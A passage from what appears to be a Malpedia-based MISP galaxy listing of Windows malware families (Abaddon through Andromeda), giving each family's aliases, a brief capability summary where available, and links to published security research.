HOMEUNIX
Hydraq
McRAT

Table 1348. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.9002
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf
https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/
https://www.secureworks.com/research/threat-profiles/bronze-keystone
http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html
https://www.infopoint-security.de/medien/the-elderwood-project.pdf
https://www.secureworks.com/research/threat-profiles/bronze-express
https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn
https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html
https://www.secureworks.com/research/threat-profiles/bronze-firestone
https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/

Abaddon

Uses Discord as C&C, has ransomware feature.

The tag is: misp-galaxy:malpedia="Abaddon"

Abaddon is also known as:

Table 1349. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon
https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

AbaddonPOS

The tag is: misp-galaxy:malpedia="AbaddonPOS"

AbaddonPOS is also known as:

PinkKite
TinyPOS

Table 1350. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos
https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/
https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak
https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/
https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/

abantes

The tag is: misp-galaxy:malpedia="abantes"

abantes is also known as:

Table 1351. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes

Abbath Banker

The tag is: misp-galaxy:malpedia="Abbath Banker"

Abbath Banker is also known as:

Table 1352. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker

AbSent Loader

The tag is: misp-galaxy:malpedia="AbSent Loader"

AbSent Loader is also known as:

Table 1353. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader
https://github.com/Tlgyt/AbSent-Loader
https://twitter.com/cocaman/status/1260069549069733888

ACBackdoor (Windows)

A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (Windows)"

ACBackdoor (Windows) is also known as:

Table 1354. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor
https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

ACEHASH

ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).

The tag is: misp-galaxy:malpedia="ACEHASH"

ACEHASH is also known as:

Table 1355. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash
https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
https://www.secureworks.com/research/threat-profiles/bronze-atlas

AcidBox

Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.

The tag is: misp-galaxy:malpedia="AcidBox"

AcidBox is also known as:

MagicScroll

Table 1356. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.epicturla.com/blog/acidbox-clustering
https://blog.talosintelligence.com/2020/08/attribution-puzzle.html
https://unit42.paloaltonetworks.com/acidbox-rare-malware/

AcridRain

AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.

The tag is: misp-galaxy:malpedia="AcridRain"

AcridRain is also known as:

Table 1357. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain
https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/

Acronym

The tag is: misp-galaxy:malpedia="Acronym"

Acronym is also known as:

Table 1358. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym

Adamantium Thief

The tag is: misp-galaxy:malpedia="Adamantium Thief"

Adamantium Thief is also known as:

Table 1359. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief
https://github.com/LimerBoy/Adamantium-Thief
https://twitter.com/ClearskySec/status/1377176015189929989

AdamLocker

Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.

The tag is: misp-galaxy:malpedia="AdamLocker"

AdamLocker is also known as:

Table 1360. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016
https://twitter.com/JaromirHorejsi/status/813712587997249536

Adhubllka

Some Ransomware distributed by TA547 in Australia

The tag is: misp-galaxy:malpedia="Adhubllka"

Adhubllka is also known as:

Table 1361. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka
https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign

AdKoob

The tag is: misp-galaxy:malpedia="AdKoob"

AdKoob is also known as:

Table 1362. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob
https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/

AdvisorsBot

AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.

The tag is: misp-galaxy:malpedia="AdvisorsBot"

AdvisorsBot is also known as:

Table 1363. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot
https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot
https://www.bromium.com/second-stage-attack-analysis/

Adylkuzz

The tag is: misp-galaxy:malpedia="Adylkuzz"

Adylkuzz is also known as:

Table 1364. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz
https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar

Afrodita

The tag is: misp-galaxy:malpedia="Afrodita"

Afrodita is also known as:

Table 1365. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita
https://twitter.com/CPResearch/status/1201957880909484033[https://twitter.com/CPResearch/status/1201957880909484033]
https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html
https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md

Agent.BTZ

The tag is: misp-galaxy:malpedia="Agent.BTZ"

Agent.BTZ is also known as:

ComRAT
Minit
Sun rootkit

Table 1366. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz
http://www.intezer.com/new-variants-of-agent-btz-comrat-found/
https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf
https://unit42.paloaltonetworks.com/ironnetinjector/
http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/
https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4
https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf
https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat

Agent Tesla

A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host’s clipboard and beacons this information back to the C2.

The tag is: misp-galaxy:malpedia="Agent Tesla"

Agent Tesla is also known as:

AgenTesla
AgentTesla
Negasteal

Table 1367. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/
https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry
https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant
https://community.riskiq.com/article/40000d46
https://community.riskiq.com/article/56e28880
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://blog.malwarelab.pl/posts/basfu_aggah/
https://www.telsy.com/download/4832/
https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/
https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire
https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf
https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/
https://menshaway.blogspot.com/2021/04/agenttesla-malware.html
https://isc.sans.edu/diary/27666
https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/
https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware
https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/
https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/
https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting
https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/
https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr
https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/
https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/
https://isc.sans.edu/diary/27088
https://www.secureworks.com/research/threat-profiles/gold-galleon
https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads
https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/
https://www.youtube.com/watch?v=Q9_1xNbVQPY
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/
https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/
https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html
https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/
https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf
https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir
https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns
https://blog.minerva-labs.com/preventing-agenttesla
https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/
https://lab52.io/blog/a-twisted-malware-infection-chain/
https://malwatch.github.io/posts/agent-tesla-malware-analysis/
https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/
https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/
https://news.sophos.com/en-us/2020/05/14/raticate/
http://www.secureworks.com/research/threat-profiles/gold-galleon
https://community.riskiq.com/article/6337984e
https://isc.sans.edu/diary/rss/27092
https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/
https://twitter.com/MsftSecIntel/status/1392219299696152578
https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/
https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/
https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf
https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader
http://blog.nsfocus.net/sweed-611/
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware
https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

AgfSpy

The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.

The tag is: misp-galaxy:malpedia="AgfSpy"

AgfSpy is also known as:

Table 1368. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy
https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

Albaniiutas

The tag is: misp-galaxy:malpedia="Albaniiutas"

Albaniiutas is also known as:

BlueTraveller

Table 1369. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas
https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas
https://blog.group-ib.com/task
https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/

Aldibot

According to Trend Micro Encyclopia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.

This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.

This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.

This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.

This backdoor executes commands from a remote malicious user, effectively compromising the affected system.

The tag is: misp-galaxy:malpedia="Aldibot"

Aldibot is also known as:

Table 1370. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot

Alfonso Stealer

The tag is: misp-galaxy:malpedia="Alfonso Stealer"

Alfonso Stealer is also known as:

Table 1371. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer
https://twitter.com/3xp0rtblog/status/1344352253294104576

Project Alice

The tag is: misp-galaxy:malpedia="Project Alice"

Project Alice is also known as:

AliceATM
PrAlice

Table 1372. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm
http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/
https://www.symantec.com/security-center/writeup/2016-122104-0203-99
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

Alina POS

The tag is: misp-galaxy:malpedia="Alina POS"

Alina POS is also known as:

alina_eagle
alina_spark
katrina

Table 1373. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos
https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/
http://www.xylibox.com/2013/02/alina-34-pos-malware.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware—sparks—off-a-new-variant/
https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/
https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina—Casting-a-Shadow-on-POS/
https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina—Following-The-Shadow-Part-1/
https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina—Following-The-Shadow-Part-2/

AllaKore

AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.

The tag is: misp-galaxy:malpedia="AllaKore"

AllaKore is also known as:

Table 1374. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt
https://twitter.com/_re_fox/status/1212070711206064131
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479
https://github.com/Anderson-D/AllaKore
https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf
https://blog.talosintelligence.com/2021/07/sidecopy.html

Allaple

The tag is: misp-galaxy:malpedia="Allaple"

Allaple is also known as:

Starman

Table 1375. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple
https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf
https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/

Almanahe

The tag is: misp-galaxy:malpedia="Almanahe"

Almanahe is also known as:

Table 1376. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.almanahe
https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Alma Communicator

The tag is: misp-galaxy:malpedia="Alma Communicator"

Alma Communicator is also known as:

Table 1377. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator
https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/
https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/

AlmaLocker

The tag is: misp-galaxy:malpedia="AlmaLocker"

AlmaLocker is also known as:

Table 1378. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker

ALPC Local PrivEsc

The tag is: misp-galaxy:malpedia="ALPC Local PrivEsc"

ALPC Local PrivEsc is also known as:

Table 1379. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe
https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

Alphabet Ransomware

The tag is: misp-galaxy:malpedia="Alphabet Ransomware"

Alphabet Ransomware is also known as:

Table 1380. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware
https://twitter.com/JaromirHorejsi/status/813714602466877440

AlphaLocker

A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.

AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware’s author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.

AlphaLocker’s encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user’s computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.

To decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.

The tag is: misp-galaxy:malpedia="AlphaLocker"

AlphaLocker is also known as:

Table 1381. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker
https://blog.cylance.com/an-introduction-to-alphalocker

AlphaNC

The tag is: misp-galaxy:malpedia="AlphaNC"

AlphaNC is also known as:

Table 1382. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
https://www.secureworks.com/research/threat-profiles/nickel-gladstone

Alreay

The tag is: misp-galaxy:malpedia="Alreay"

Alreay is also known as:

Table 1383. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay
https://securelist.com/blog/sas/77908/lazarus-under-the-hood/

Alureon

The tag is: misp-galaxy:malpedia="Alureon"

Alureon is also known as:

Olmarik
Pihar
TDL
TDSS
wowlik

Table 1384. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon
http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html
http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html
http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html
https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt
https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/
https://www.youtube.com/watch?v=FttiysUZmDw

Amadey

The tag is: misp-galaxy:malpedia="Amadey"

Amadey is also known as:

Table 1385. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html
https://twitter.com/ViriBack/status/1062405363457118210
https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/
https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware
https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/
https://nao-sec.org/2019/04/Analyzing-amadey.html
https://isc.sans.edu/diary/27264
https://www.anquanke.com/post/id/230116
https://twitter.com/0xffff0800/status/1062948406266642432
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

AMTsol

The tag is: misp-galaxy:malpedia="AMTsol"

AMTsol is also known as:

Adupihan

Table 1386. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol
https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/
http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

Anatova Ransomware

Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.

The tag is: misp-galaxy:malpedia="Anatova Ransomware"

Anatova Ransomware is also known as:

Table 1387. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom
https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

Anchor

Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.

The tag is: misp-galaxy:malpedia="Anchor"

Anchor is also known as:

Table 1388. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor
https://isc.sans.edu/diary/27308
https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns
https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/
https://www.netscout.com/blog/asert/dropping-anchor
https://unit42.paloaltonetworks.com/ryuk-ransomware/
https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns
https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/
https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/
https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/
https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607
https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/
https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

Andromeda

The tag is: misp-galaxy:malpedia="Andromeda"

Andromeda is also known as:

B106-Gamarue
B67-SS-Gamarue
Gamarue
b66

Table 1389. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation
https://blog.avast.com/andromeda-under-the-microscope
http://blog.morphisec.com/andromeda-tactics-analyzed
https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis
